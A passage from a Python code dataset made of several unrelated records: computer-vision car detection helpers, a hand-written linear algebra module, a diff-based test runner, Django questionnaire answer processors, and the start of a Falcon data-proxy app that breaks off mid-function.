(mean squared error): \" + str(mean_squared_error(y_pre, y_test)))\nprint(\"R-squared: \" + str(r2_score(y_test, y_pre)))\n\nskmodel = LinearRegression()\nskmodel.fit(x_train, y_train)\ny_pre = skmodel.predict(x_test)\n\nprint(\"-- sklearn --\")\nprint(\"MSE (mean squared error): \" + str(mean_squared_error(y_pre, y_test)))\nprint(\"R-squared: \" + str(r2_score(y_test, y_pre)))","sub_path":"7.13-7.14/LR/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"129651102","text":"import matplotlib.image as mpimg\nimport cv2\nimport numpy as np\nfrom skimage.feature import hog\nfrom joblib import Memory\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom scipy.ndimage.measurements import label\nimport matplotlib.pyplot as plt\nimport glob\n\nmemory = Memory(cachedir='cache')\n\ndef traverse_train_dataset(base_dir, dirs):\n    return np.concatenate([[f for f in glob.glob('%s/%s/*.png' % (base_dir, d))] for d in dirs])\n\ndef data_look(car_list, notcar_list):\n    data_dict = {}\n    \n    data_dict[\"n_cars\"] = len(car_list)\n    data_dict[\"n_notcars\"] = len(notcar_list)\n    \n    example_img = mpimg.imread(car_list[0])\n    data_dict[\"image_shape\"] = example_img.shape\n    data_dict[\"data_type\"] = example_img.dtype\n\n    return data_dict\n\ndef draw_boxes(img, bboxes, color=(0, 0, 255), thick=6):\n    draw_img = np.copy(img)\n\n    for bbox in bboxes:\n        cv2.rectangle(draw_img, bbox[0], bbox[1], color, thick)\n    \n    return draw_img\n\n# Define a function to compute color histogram features \ndef color_hist_rgb(img, nbins=32, bins_range=(0, 256)):\n    # Compute the histogram of the RGB channels separately\n    rhist = np.histogram(img[:,:,0], bins=nbins, range=bins_range)\n    ghist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n    bhist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n    \n    # Generating bin centers\n    bin_edges = rhist[1]\n    bin_centers = (bin_edges[1:] + bin_edges[0:len(bin_edges)-1])/2\n    \n    # Concatenate the histograms into a single feature vector\n    hist_features = np.concatenate((rhist[0], ghist[0], bhist[0]))\n    \n    # Return the individual histograms, bin_centers and feature vector\n    return rhist, ghist, bhist, bin_centers, hist_features\n\ndef color_hist(img, nbins=32, bins_range=(0, 256)):\n    # Compute the histogram of the color channels separately\n    channel1_hist = np.histogram(img[:,:,0], 
bins=nbins, range=bins_range)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n \n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n \n # Return the concatenated feature vector\n return hist_features\n\n# Define a function to compute binned spatial features\ndef bin_spatial(img, size=(32, 32)):\n # Use cv2.resize().ravel() to create the feature vector\n features = cv2.resize(img, size).ravel() \n\n return features\n\n# Define a function to return HOG features and visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=True):\n if vis == True:\n features, hog_image = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), transform_sqrt=False, \n visualise=True, feature_vector=False)\n return features, hog_image\n else: \n features = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), transform_sqrt=False, \n visualise=False, feature_vector=feature_vec)\n return features\n \ndef single_img_features(image, conv=None, spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2,\n spatial_feat=True, hist_feat=True, hog_feat=True):\n\n feature_image = np.copy(image) if conv is None else cv2.cvtColor(image, conv)\n\n spatial_features = []\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n\n hist_features = []\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n\n hog_features = [] \n if hog_feat == True:\n # Call get_hog_features() with vis=False, feature_vec=True\n for channel in range(feature_image.shape[2]):\n hog_features.append(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True))\n hog_features = np.ravel(hog_features) \n\n return np.concatenate([spatial_features, hist_features, hog_features])\n \n \n# Define a function to extract features from a list of images\n# Have this function call bin_spatial() and color_hist()\n@memory.cache\ndef extract_features(imgs, *args, **kwargs):\n\n # Create a list to append feature vectors to\n features = []\n \n # Iterate through the list of images\n for file in imgs:\n image = mpimg.imread(file)\n \n features.append(single_img_features(image, *args, **kwargs))\n\n return features\n\n \n# Define a single function that can extract features using hog sub-sampling and make predictions\ndef find_cars(img, conv, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins):\n\n img = img.astype(np.float32) / 255\n \n img_tosearch = img[ystart:ystop,:,:]\n \n ctrans_tosearch = cv2.cvtColor(img_tosearch, conv)\n \n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n \n ch1 = ctrans_tosearch[:,:,0]\n ch2 = ctrans_tosearch[:,:,1]\n ch3 = ctrans_tosearch[:,:,2]\n \n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, vis=False, 
feature_vec=False)\n \n # Define blocks and steps as above\n nxblocks = (ch1.shape[1] // pix_per_cell)-1\n nyblocks = (ch1.shape[0] // pix_per_cell)-1 \n nfeat_per_block = orient * cell_per_block ** 2\n \n # 64 was the original sampling rate, with 8 cells and 8 pix per cell\n window = 64\n nblocks_per_window = (window // pix_per_cell)-1 \n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step + 1\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step + 1\n \n rectangles = []\n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n \n # Extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat3 = hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n \n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos * pix_per_cell\n ytop = ypos * pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop+window, xleft:xleft+window], (64, 64))\n \n # Get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1)) \n #test_features = X_scaler.transform(np.hstack((shape_feat, hist_feat)).reshape(1, -1)) \n test_prediction = svc.predict(test_features)\n \n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale)\n win_draw = np.int(window*scale)\n \n rectangles.append(((xbox_left, ytop_draw+ystart),(xbox_left+win_draw,ytop_draw+win_draw+ystart)))\n \n return rectangles\n\ndef slide_window(img, ystart, ystop, pix_per_cell, cell_per_block, scale): \n window = 64 * scale\n pix_per_cell = pix_per_cell * scale\n \n # Define blocks and steps as above\n nxblocks = (img.shape[1] // pix_per_cell)-1\n nyblocks = ((ystop - ystart) // pix_per_cell)-1 \n \n # 64 was the original sampling rate, with 8 cells and 8 pix per cell\n nblocks_per_window = (window // pix_per_cell)-1 \n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = int((nxblocks - nblocks_per_window) // cells_per_step) + 1\n nysteps = int((nyblocks - nblocks_per_window) // cells_per_step) + 1\n \n window_list = []\n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb * cells_per_step\n xpos = xb * cells_per_step\n\n xleft = xpos * pix_per_cell\n ytop = ypos * pix_per_cell + ystart\n\n window_list.append(((xleft, ytop), (xleft + window, ytop + window)))\n\n return window_list\n\ndef scale_steps(scale_start, scale_end, step):\n steps = int((scale_end - scale_start) / step)\n return scale_start + np.arange(steps) * step\n\ndef find_cars_multiscaled(image, scales, *args, **kwargs):\n car_boxes = []\n \n for scale in scales:\n scale_boxes = find_cars(image, scale=scale, *args, **kwargs)\n \n if (len(scale_boxes) > 0):\n # Fix np.concatenate() ValueError: all the input arrays must have same number of dimensions\n car_boxes.append(scale_boxes)\n\n # Fix ValueError: need at least one array to concatenate\n return np.concatenate(car_boxes) if len(car_boxes) > 0 else []\n\ndef visualize_found_cars(img, bbox_list):\n draw_img = np.copy(img)\n \n for box in bbox_list:\n cv2.rectangle(draw_img, 
(box[0][0], box[0][1]), (box[1][0], box[1][1]), (0, 0, 255), 6) \n \n return draw_img\n\ndef add_heat(heatmap, bbox_list):\n # Iterate through list of bboxes\n for box in bbox_list:\n # Add += 1 for all pixels inside each bbox\n # Assuming each \"box\" takes the form ((x1, y1), (x2, y2))\n heatmap[box[0][1]:box[1][1], box[0][0]:box[1][0]] += 1\n\n return heatmap\n \ndef apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n\n return heatmap\n\ndef draw_labeled_bboxes(img, labels):\n # Iterate through all detected cars\n for car_number in range(1, labels[1]+1):\n # Find pixels with each car_number label value\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n # Draw the box on the image\n cv2.rectangle(img, bbox[0], bbox[1], (0,0,255), 6)\n\n return img\n\n@memory.cache\ndef train_svc(scaled_X, y):\n # Split up data into randomized training and test sets\n rand_state = np.random.randint(0, 100)\n X_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.2, random_state=rand_state)\n\n svc = LinearSVC()\n\n svc.fit(X_train, y_train)\n \n return svc, svc.score(X_test, y_test)\n\ndef get_heatmap(image, *args, **kwargs):\n car_boxes = find_cars_multiscaled(image, *args, **kwargs)\n \n heat = np.zeros_like(image[:,:,0]).astype(np.float)\n heat = add_heat(heat, car_boxes)\n \n return heat\n\ndef annotate_frame(image, thresh=0, *args, **kwargs):\n heat = get_heatmap(image, *args, **kwargs)\n \n if thresh > 0:\n heat = apply_threshold(heat, thresh)\n \n labels = label(heat)\n \n return draw_labeled_bboxes(np.copy(image), labels)\n\ndef plot_annotate_and_heatmap(image, thresh=0, *args, **kwargs):\n heat = get_heatmap(image, *args, **kwargs)\n \n heat = apply_threshold(heat, thresh)\n\n heatmap = np.clip(heat, 0, 255)\n\n # Find final boxes from heatmap using label function\n labels = label(heatmap)\n draw_img = draw_labeled_bboxes(np.copy(image), labels)\n\n fig = plt.figure()\n plt.subplot(121)\n plt.imshow(draw_img)\n plt.title('Car Positions')\n plt.subplot(122)\n plt.imshow(heatmap, cmap='hot')\n plt.title('Heat Map')\n fig.tight_layout()","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":12529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"645440901","text":"import math\nimport copy\nfrom Matrix import Matrix\n\n# This is the simplest algorithm I could find for putting a matrix in row-reduced echelon form\n# I'm sure a better algorithm will take significantly more research\n# TODO: Research if more accurate algorithms exist for row reducing matrix\ndef rref(M):\n    if not isinstance(M, Matrix):\n        return\n    l = 0\n    m = copy.deepcopy(M)\n    rows, cols = m.size()\n    for r in range(rows):\n        if l >= cols:\n            return m\n        i = r\n        # Find a row that has a pivot in the i,l position\n        while math.isclose(m[i][l], 0, abs_tol=.001):\n            i += 1\n            if i == rows:\n                i = r\n                l += 1\n                if l == cols:\n                    return m\n        # Swap rows if necessary\n        for k in range(cols):\n            t = m[i][k]\n            m[i][k] = m[r][k] \n            m[r][k] = t\n        # Get the pivot value\n        lv = m[r][l]\n        # Divide the entire row by the pivot value, which sets the pivot to one\n        for k in range(cols):\n            m[r][k] = m[r][k] / lv\n        # Zero out every other entry in the pivot column\n        for i in 
range(rows):\n if i != r:\n lv = m[i][l]\n for k in range(cols):\n m[i][k] = m[i][k] - lv * m[r][k]\n l += 1\n return m\n\n# I haven't done research on how this algorithm can be made smarter.\n# There are likely early outs and assumptions that can be made on the matrix.\n# TODO: Research more ways to determine rank of matrix\ndef rank(M, is_reduced=False):\n if not isinstance(M, Matrix):\n return 0\n # If the matrix is indicated as already reduced don't do the work\n if not is_reduced:\n rrefm = rref(M)\n else:\n rrefm = M\n rows, cols = rrefm.size()\n l = 0\n r = 0\n for row in range(rows):\n while l < cols and math.isclose(rrefm[row][l], 0, abs_tol=.001):\n l += 1\n if l >= cols:\n return r\n # Navigate up to the first non zero, this is the pivot point\n r += 1\n return r\n\n# This will calculate the free variables in a matrix, the free variables are\n# defined as the number of columns, or unknowns, minus the rank (pivot variables)\ndef nullity(M, is_reduced=False):\n if not isinstance(M, Matrix):\n return 0\n return M.cols - rank(M, is_reduced)\n\n# Helper function for lu()\ndef __ludot(length, U, L, i, j):\n val = 0\n for k in range(length):\n val += U[k][j] * L[i][k]\n return val\n\n# This function will do the LU factorization for a Matrix A and return \n# [L, U, P] for L: lower triangular matrix, U: upper triangular matrix and P: \n# permutation matrix used to keep the largest element in pivot locations.\ndef lu(M, info=None):\n if not isinstance(M, Matrix):\n return None\n rows, cols = M.size()\n if rows != cols:\n raise ArithmeticError(\"LU factorization requires a square matrix (rows == cols)\") \n A = copy.deepcopy(M)\n L = Matrix(rows, cols, mtype='i')\n U = Matrix(rows, cols)\n P = Matrix(rows, cols, mtype='i')\n # Adjust rows of A so largest element is in the pivot of each row\n l = 0\n swaps = 0\n for i in range(rows):\n max_l = abs(A[i][l])\n swap = i\n for j in range(i + 1, rows):\n if abs(A[j][l]) > max_l:\n max_l = abs(A[j][l])\n swap = j\n if i != swap:\n P.swap(i, swap)\n swaps += 1\n l += 1\n # Swap rows to get larger pivots\n A = P * A\n # Keep track of the current pivot we are at to determine side of diagonal\n l = 0\n for i in range(rows):\n for j in range(cols):\n # Upper diagonal of U, including diagonal\n if j >= l:\n U[i][j] = A[i][j] - __ludot(i, U, L, i, j)\n # Lower diagonal of L, not including the diagonal\n else:\n L[i][j] = 1 / U[j][j] * (A[i][j] - __ludot(j, U, L, i, j))\n l += 1\n if info and info == 's':\n return [L, U, P, swaps]\n return [L, U, P]\n\n# Will do our best to solve Ax = b, assume b is a list\n# Will return the solution x; LU factorization with partial pivoting is used internally for numerical accuracy\ndef linsolve(A, b):\n if not isinstance(A, Matrix):\n return None\n # Expect b to be a list\n if isinstance(b, Matrix):\n b = b.list()\n # Verify b was a matrix turned into a list or was passed as a list\n if not isinstance(b, list):\n return None\n # Not sure how we should solve non square matrices since there are non-unique solutions\n M = copy.deepcopy(A)\n if A.rows != A.cols or rank(A) != A.cols:\n raise ArithmeticError(\"Can only solve for square, invertible matrices\")\n L, U, P = lu(M)\n bp = (P * b).list()\n # Below works because if Lc = b and Ux = c, then Ax = LUx = L(Ux) = Lc = b\n # Solve Lc = b\n c = [1] * L.rows\n for i in range(L.rows):\n rhs = bp[i]\n for j in range(L.cols):\n if i != j:\n rhs -= L[i][j] * c[j]\n # No need to divide pivot since the lower triangular matrix has 1s in the pivots\n c[i] = rhs\n # Now solve Ux = c\n x = [1] * U.rows\n for i in range(U.rows - 1, 
-1, -1):\n rhs = c[i]\n for j in range(U.cols):\n if i != j:\n rhs -= U[i][j] * x[j]\n x[i] = rhs / U[i][i]\n return x\n\n# Solve inverse by augmenting identity matrix to A and performing row reduction\ndef inv(A):\n if not isinstance(A, Matrix):\n return None\n if A.rows != A.cols:\n raise ArithmeticError('Non-square matrices do not have an inverse')\n if rank(A) != A.cols:\n raise ArithmeticError('Matrix A must have full column rank to be an invertible matrix')\n i = Matrix(A.rows, A.cols, mtype='i')\n t = copy.deepcopy(A)\n t.augment(i)\n r = rref(t)\n return r.slice(0, A.cols)\n\n# Compute the dot product of two lists\ndef dot(l1, l2):\n if not isinstance(l1, list):\n raise ArithmeticError('Cannot do dot product on non-list types')\n if not isinstance(l2, list):\n raise ArithmeticError('Cannot do dot product on non-list types')\n if len(l1) != len(l2):\n raise ArithmeticError('Size of lists do not match')\n r = 0\n for i in range(len(l1)):\n r += l1[i] * l2[i]\n return r\n\n# Returns the Euclidean norm of the list l\ndef norm(l):\n if not isinstance(l, list):\n raise ArithmeticError('Cannot compute euclidean distance of a non-list')\n return math.sqrt(dot(l, l))\n\n# Projection of vectors a onto b\ndef proj(a, b):\n if not isinstance(a, list) or not isinstance(b, list):\n raise ArithmeticError('Can only currently project lists onto lists')\n c = dot(a, b) / dot(b, b)\n return [c * b[i] for i in range(len(b))]\n\n# Component-wise subtraction of the list b from the list a\ndef __lsub(a, b):\n if not isinstance(a, list) or not isinstance(b, list):\n raise AttributeError('Both parameters must be lists')\n if len(a) != len(b):\n raise ArithmeticError('Both lists must be the same size')\n return [a[i] - b[i] for i in range(len(a))]\n\n# Component-wise division of the list a by the value b\ndef __ldiv(a, b):\n if not isinstance(a, list):\n raise AttributeError('Parameter a must be a list')\n return [a[i] / b for i in range(len(a))]\n\n# Uses Gram-Schmidt process to orthonormalize the matrix A\ndef orth(A):\n if not isinstance(A, Matrix):\n raise ArithmeticError('Can only execute Gram-Schmidt on Matrices')\n Q = copy.deepcopy(A)\n for j in range(A.cols):\n c = Q.col(j)\n Q.set_col(j, __ldiv(c, norm(c)))\n qj = Q.col(j)\n for i in range(j + 1, A.cols):\n ci = Q.col(i)\n Q.set_col(i, __lsub(ci, proj(ci, qj)))\n return Q\n\n# Test if Matrix is upper triangular\ndef istriu(A):\n if not isinstance(A, Matrix):\n return False\n if A.cols != A.rows:\n return False\n for i in range(1, A.rows):\n # Up until the diagonal\n for j in range(i):\n if not math.isclose(A[i][j], 0, abs_tol=.001):\n return False\n return True\n\ndef istril(A):\n if not isinstance(A, Matrix):\n return False\n if A.cols != A.rows:\n return False\n for j in range(1, A.cols):\n # Up until the diagonal\n for i in range(j):\n if not math.isclose(A[i][j], 0, abs_tol=.001):\n return False\n return True\n\n# Perform QR factorization on the matrix A\ndef qr(A):\n if not isinstance(A, Matrix):\n raise AttributeError('A must be a matrix')\n Q = orth(A)\n # Finding a matrix R such that A = QR\n # A = QR\n # Q(inverse) * A = Q(inverse) * Q * R\n # Q(inverse) * A = I * R\n # The inverse of an orthonormal matrix is Q(transpose)\n R = Q.transposed() * A\n return [Q, R]\n\n# Calculate the determinant of a matrix A using LU factorization.\n# The determinant of a triangular matrix is the product of the diagonal entries.\n# Therefore:\n# if A = P*L*U\n# det(A) = det(P)*det(L)*det(U)\n# where\n# det(P) is -1^(number of row exchanges)\ndef 
det(A):\n if not isinstance(A, Matrix):\n raise AttributeError('A must be a matrix')\n # Quick case that the matrix is already triangular\n if istriu(A) or istril(A):\n det = A[0][0]\n for i in range(1, A.rows):\n det *= A[i][i]\n return det\n # If matrix is singular the determinant is 0\n if rank(A) != A.cols:\n return 0\n # Else generate triangular factorization\n L, U, P, row_exchanges = lu(A, info='s')\n detP = math.pow(-1, row_exchanges)\n detL = L[0][0]\n for i in range(1, L.rows):\n detL *= L[i][i]\n detU = U[0][0]\n for i in range(1, U.rows):\n detU *= U[i][i]\n return detP * detL * detU","sub_path":"lalg.py","file_name":"lalg.py","file_ext":"py","file_size_in_byte":9727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"154302434","text":"#!/bin/env python\n\n# Copyright (C) 2013 Arthur D'Andréa Alemar\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\n# the Software, and to permit persons to whom the Software is furnished to do so,\n# subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport os.path\nimport subprocess\n\nfrom tempfile import TemporaryFile\nfrom difflib import unified_diff\n\nclass TestCase:\n    def __init__(self, testName, input, output):\n        self.testName = testName\n        self.input = input\n        self.output = output\n\nclass TestResult:\n    def __init__(self, case, diff):\n        self.case = case\n        self.diff = diff\n    \n    def __nonzero__(self):\n        return len(self.diff) == 0\n\n    # keep truthiness working on Python 3 as well\n    __bool__ = __nonzero__\n\nOK = '\\033[92m'\nFAIL = '\\033[91m'\nEND = '\\033[0m'\n\nclass TestRunner:\n    def __init__(self):\n        self._tests = []\n    \n    def addTestCase(self, testName, input, output):\n        self._tests.append(TestCase(testName, input, output))\n    \n    def run(self, args):\n        self.results = []\n        tests = 0\n        tests_ok = 0\n        tests_fail = 0\n        for test in self._tests:\n            with TemporaryFile(mode='w+') as tempfile:\n                with open(test.input, 'Ur') as stdin:\n                    subprocess.call([\"bin/main\"]+args, stdin=stdin, stdout=tempfile, stderr=subprocess.STDOUT)\n                tempfile.seek(0)\n                diff = None\n                with open(test.output, 'Ur') as expected_output:\n                    diff = ''.join(unified_diff(list(tempfile), list(expected_output), fromfile='actual.'+test.testName, tofile='expected.'+test.testName))\n                result = TestResult(test, diff)\n                tests += 1\n                if result:\n                    tests_ok += 1\n                    sys.stdout.write(OK + \".\")\n                else:\n                    tests_fail += 1\n                    sys.stdout.write(FAIL + \"F\")\n                self.results.append(result)\n        if tests_fail == 0:\n            sys.stdout.write(\"\\nSUCCESS ({0} tests successful)\\n\".format(tests))\n            sys.stdout.write(END)\n        else:\n            sys.stdout.write(\"{0}\\nFAIL {1}({2} tests successful, {3} tests 
failed)\\n\\n\".format(FAIL, END, tests_ok, tests_fail))\n sys.stdout.write(END)\n for result in self.results:\n if not result:\n sys.stdout.write(result.diff)\n\nif __name__ == \"__main__\":\n try:\n import colorama\n except ImportError:\n pass\n else:\n colorama.init()\n \n import glob\n runner = TestRunner()\n for test in glob.glob(\"tests/test.*.txt\"):\n output = os.path.join(os.path.dirname(test), \"results\", os.path.basename(test))\n if os.path.exists(output):\n runner.addTestCase(os.path.basename(test), test, output)\n else:\n print(\"output file \\\"\"+output+\"\\\" does not exist\")\n #testName = \"test-{:03}.txt\".format(x)\n #input = os.path.join(\"test\", testName)\n #output = os.path.join(\"test\", \"result\", testName)\n #if os.path.exists(input) and os.path.exists(output):\n # runner.addTestCase(testName, input, output)\n runner.run(sys.argv[1:])","sub_path":"hash/runTests.py","file_name":"runTests.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"361749369","text":"from questionnaire import *\nfrom django.utils.translation import ugettext as _, ungettext\n\n@question_proc('choice', 'choice-freeform')\ndef question_choice(request, question):\n choices = []\n jstriggers = []\n\n cd = question.getcheckdict()\n key = \"question_%s\" % question.number\n key2 = \"question_%s_comment\" % question.number\n val = None\n if key in request.POST:\n val = request.POST[key]\n else:\n if 'default' in cd:\n val = cd['default']\n for choice in question.choices():\n choices.append( ( choice.value == val, choice, ) )\n\n if question.type == 'choice-freeform':\n jstriggers.append('%s_comment' % question.number)\n\n return {\n 'choices' : choices,\n 'sel_entry' : val == '_entry_',\n 'qvalue' : val or '',\n 'required' : True,\n 'nobreaks' : cd.get(\"nobreaks\", False),\n 'comment' : request.POST.get(key2, \"\"),\n 'jstriggers': jstriggers,\n }\n\n@answer_proc('choice', 'choice-freeform')\ndef process_choice(question, answer):\n opt = answer['ANSWER'] or ''\n if not opt:\n raise AnswerException(_(u'You must select an option'))\n if opt == '_entry_' and question.type == 'choice-freeform':\n opt = answer.get('comment','')\n if not opt:\n raise AnswerException(_(u'Field cannot be blank'))\n else:\n valid = [c.value for c in question.choices()]\n if opt not in valid:\n raise AnswerException(_(u'Invalid option!'))\n return opt\nadd_type('choice', 'Choice [radio]')\nadd_type('choice-freeform', 'Choice with a freeform option [radio]')\n\n\n@question_proc('choice-multiple', 'choice-multiple-freeform')\ndef template_multiple(request, question):\n key = \"question_%s\" % question.number\n choices = []\n counter = 0\n cd = question.getcheckdict()\n defaults = cd.get('default','').split(',')\n for choice in question.choices():\n counter += 1\n key = \"question_%s_multiple_%d\" % (question.number, choice.sortid)\n if key in request.POST or \\\n (request.method == 'GET' and choice.value in defaults):\n choices.append( (choice, key, ' checked',) )\n else:\n choices.append( (choice, key, '',) )\n extracount = int(cd.get('extracount', 0))\n if not extracount and question.type == 'choice-multiple-freeform':\n extracount = 1\n extras = []\n for x in range(1, extracount+1):\n key = \"question_%s_more%d\" % (question.number, x)\n if key in request.POST:\n extras.append( (key, request.POST[key],) )\n else:\n extras.append( (key, '',) )\n return {\n \"choices\": choices,\n \"extras\": extras,\n \"nobreaks\" : 
cd.get(\"nobreaks\", False),\n \"template\" : \"questionnaire/choice-multiple-freeform.html\",\n \"required\" : cd.get(\"required\", False) and cd.get(\"required\") != \"0\",\n\n }\n\n@answer_proc('choice-multiple', 'choice-multiple-freeform')\ndef process_multiple(question, answer):\n multiple = []\n\n requiredcount = 0\n required = question.getcheckdict().get('required', 0)\n if required:\n try:\n requiredcount = int(required)\n except ValueError:\n requiredcount = 1\n if requiredcount and requiredcount > question.choices().count():\n requiredcount = question.choices().count()\n\n for k, v in answer.items():\n if k.startswith('multiple'):\n multiple.append(v)\n if k.startswith('more') and len(v.strip()) > 0:\n multiple.append(v)\n\n if len(multiple) < requiredcount:\n raise AnswerException(ungettext(u\"You must select at least %d option\",\n u\"You must select at least %d options\",\n requiredcount) % requiredcount)\n return \"; \".join(multiple)\nadd_type('choice-multiple', 'Multiple-Choice, Multiple-Answers [checkbox]')\nadd_type('choice-multiple-freeform', 'Multiple-Choice, Multiple-Answers, plus freeform [checkbox, input]')\n\n\n","sub_path":"questionnaire/qprocessors/choice.py","file_name":"choice.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"639470809","text":"import falcon\nimport logging\nimport pkg_resources\n\nfrom .stores import RawStore, ProcessedFileStore,\\\n IncidentFileStore, CacheFileStore\n\nfrom .routes.push import PushReceiver\nfrom .provider.json.processor import GenericJsonProcessor\nfrom . import Config\nimport threading\nimport os\n\n\ndef get_push_receiver(provider_name, provider_processor, provider_success_response=None, raw_store=None, processed_store=None, incident_store=None):\n if provider_success_response is None:\n provider_success_response = Config.get(provider_name, \"processor\", \"response\", default=\"RECEIVED_OK\")\n if raw_store is None:\n raw_store = RawStore()\n if processed_store is None:\n processed_store = ProcessedFileStore()\n if incident_store is None:\n incident_store = IncidentFileStore()\n return PushReceiver(\n raw_store,\n processed_store,\n incident_store,\n provider_name,\n provider_success_response,\n provider_processor\n )\n\n\ndef create_app(raw_store, processed_store, incident_store):\n \"\"\"\n Creates the Falcon app and adds routes to all providers\n \"\"\"\n api = falcon.API()\n\n provider_config = Config.get(\"providers\", default={})\n\n background_threads = []\n\n for key, value in provider_config.items():\n logging.getLogger(__name__).info(\"Configuring provider \" + key + \" ...\")\n if \"processor\" in value and value[\"processor\"][\"type\"] == \"generic\":\n _processor = GenericJsonProcessor(value[\"processor\"].get(\"timezone\", None))\n logging.getLogger(__name__).info(\" ... processor \" + _processor.__class__.__name__)\n else:\n module_to_load = Config.get(\"providers\", key, \"module\", default=key)\n try:\n module = __import__(module_to_load, fromlist=[module_to_load])\n except Exception: # ModuleNotFoundError\n module = __import__(\"dataproxy.provider.modules.\" + module_to_load, fromlist=[module_to_load])\n logging.getLogger(__name__).info(\" ... 
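`process_multiple` in choice.py derives a minimum-selection count from the question's check dict and clamps it to the number of available choices. The same rule isolated from Django (inputs hypothetical):

```python
def required_count(required_setting, num_choices):
    # a truthy but non-numeric setting means "at least one", per the record
    try:
        count = int(required_setting)
    except (TypeError, ValueError):
        count = 1 if required_setting else 0
    return min(count, num_choices)  # never demand more than exists

print(required_count('3', 2))    # 2 -- clamped to the number of choices
print(required_count('yes', 5))  # 1
print(required_count(None, 5))   # 0
```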
